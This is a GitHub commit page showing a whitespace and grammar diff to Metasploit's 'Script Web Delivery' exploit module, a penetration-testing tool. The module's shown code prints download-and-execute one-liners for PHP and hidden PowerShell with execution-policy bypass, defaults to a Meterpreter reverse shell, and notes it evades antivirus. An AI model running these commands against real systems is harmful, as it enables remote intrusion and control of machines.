Skip to content

Commit 1a8d73f

Browse files
committed
Minor whitespace and grammar changes
1 parent a735fd3 commit 1a8d73f

File tree

1 file changed

+12
-12
lines changed

1 file changed

+12
-12
lines changed

modules/exploits/multi/script/web_delivery.rb

Lines changed: 12 additions & 12 deletions
Original file line numberDiff line numberDiff line change
@@ -12,35 +12,35 @@ class Metasploit3 < Msf::Exploit::Remote
1212

1313
def initialize(info = {})
1414
super(update_info(info,
15-
'Name' => 'Script Web Delivery',
16-
'Description' => %q{
15+
'Name' => 'Script Web Delivery',
16+
'Description' => %q{
1717
This module quickly fires up a web server that serves a payload.
1818
The provided command will start the specified scripting language interpreter and then download and execute the
1919
payload. The main purpose of this module is to quickly establish a session on a target
2020
machine when the attacker has to manually type in the command himself, e.g. Command Injection,
2121
RDP Session, Local Access or maybe Remote Command Exec. This attack vector does not
22-
write to disk so is less likely to trigger AV solutions and will allow privilege
22+
write to disk so it is less likely to trigger AV solutions and will allow privilege
2323
escalations supplied by Meterpreter.
2424
},
25-
'License' => MSF_LICENSE,
26-
'Author' =>
25+
'License' => MSF_LICENSE,
26+
'Author' =>
2727
[
2828
'Andrew Smith "jakx" <[email protected]>',
2929
'Ben Campbell <eat_meatballs[at]hotmail.co.uk>',
3030
'Chris Campbell' #@obscuresec - Inspiration n.b. no relation!
3131
],
3232
'DefaultOptions' =>
3333
{
34-
'Payload' => 'python/meterpreter/reverse_tcp'
34+
'Payload' => 'python/meterpreter/reverse_tcp'
3535
},
36-
'References' =>
36+
'References' =>
3737
[
3838
[ 'URL', 'http://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html'],
3939
[ 'URL', 'http://www.pentestgeek.com/2013/07/19/invoke-shellcode/' ],
4040
[ 'URL', 'http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/'],
4141
[ 'URL', 'http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html']
4242
],
43-
'Platform' => %w{ python php win},
43+
'Platform' => %w{python php win},
4444
'Targets' =>
4545
[
4646
['Python', {
@@ -62,8 +62,8 @@ def initialize(info = {})
6262
],
6363
'DefaultTarget' => 0,
6464
'DisclosureDate' => 'Jul 19 2013'
65-
))
66-
end
65+
))
66+
end
6767

6868
def on_request_uri(cli, request)
6969
print_status("Delivering Payload")
@@ -78,7 +78,7 @@ def on_request_uri(cli, request)
7878
def primer
7979
url = get_uri()
8080
print_status("Run the following command on the target machine:")
81-
case target.name
81+
case target.name
8282
when "PHP"
8383
print_line("php -d allow_url_fopen=true -r \"eval(file_get_contents('#{url}'));\"")
8484
when "Python"
@@ -88,4 +88,4 @@ def primer
8888
print_line("powershell.exe -w hidden -nop -ep bypass -c \"#{download_and_run}\"")
8989
end
9090
end
91-
end
91+
end

0 commit comments

Comments
 (0)